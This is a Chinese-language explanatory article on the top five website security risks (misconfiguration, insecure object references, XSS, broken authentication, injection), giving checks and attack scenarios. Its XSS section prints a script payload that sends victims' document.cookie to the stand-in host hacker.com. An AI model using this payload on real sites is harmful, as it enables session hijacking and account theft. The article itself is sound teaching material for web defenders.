網站安全風險前五名
這篇文章主要介紹網站資訊安全風險排行榜前五名,
分別針對每一個風險說明資訊安全風險的情境,網站保護的建議
5. Security Misconfiguration
如何檢查
- 使用的軟體或是系統元件是否有過期沒有更新? 例如作業系統、網站、資料庫、程式庫等。駭客會利用已知的弱點進行攻擊。
- 額外安裝其他不需要的服務。例如:ports、服務、Demo網頁、Demo帳號
- 是否有預設的帳號與密碼沒有改變
- 是否有過多額外的錯誤訊息,例如版本資訊、語法錯誤等
- 各個程式語言架構相關的資訊安全設定
駭客攻擊情境
- 網站預設的帳號密碼沒有更改,駭客用預設的系統管理頁面登入
- 網站 Directory listing 沒有取消,因此駭客可以輕易地瀏覽該網站所有的檔案與路徑,進一步找到相關的程式與系統資訊。
- Demo或是示範的網站沒有被移除。例如 IIS 或是資料庫安裝後都會有預設的 Demo WebSite。該Demo Website 有淺在已知的風險。駭客藉由這些 web攻擊。
4.Insecure Object Reference
這個攻擊說明的是駭客可以透過一些方法讀取重要的系統資源、資料庫資訊、檔案等
駭客攻擊情境
- 駭客透過 Google 間接取得連結,存取重要檔案、PDF、Image等網址,而不需要驗證。
- 駭客透過參數的修改間接取得其他權限的資訊內容。例如修改部門參數,取得其他部門資訊:
http://vulsite.com/app/accountInfo?acct=FIN
http://vulsite.com/app/accountInfo?acct=ENG
http://vulsite.com/app/accountInfo?acct=HR
3. Cross-Site Scripting XSS
也就是俗稱的 JavaScript Injection。
透過 JavaScript 的輸入,讓網站或是受害使用者間接執行非預期的結果。
駭客攻擊情境
- 透過訪客留言版輸入 JavaScript,讓其他受訪者瀏覽到該留言版時,間接執行有害的 JavaScript
- 透過 URL 或是參數執行 JavaScript ,讓受害者誤點擊URL 而執行
舉例來說,駭客透過下列的 Script 將 cookie 讀取(document.cookie)之後,
傳送至 hacker.com 的網站,
Hacker.com 網站透過cookie.cgi將 cookie讀取至變數 Stolen_cookie
‘><script>document.location= ‘http://www.hacker.com/cookie.cgi ?Stolen_Cookie=’+document.cookie</script>’.
2. Broken Authentication & Session Management
這類主要指的是帳號密碼驗證,與登入之後相關 Session 的管理,舉例來說:
- 密碼是否有經過 Hash或是加密處理.
- 密碼的管理、帳號建立、密碼修改、密碼重設等
- Session IDs 是否很容易猜到.
- Session IDs 是否在一段時間沒有使用之後會自動失效
- Session IDs 是否會重複被使用
- 密碼與帳號是否在傳輸過程中有加密
1. Injection
這類廣泛指的是 SQL, OS , 各種的 Injection
透過非法字元的輸入讓網站或是系統執行非預期的 scripts.造成非預期的結果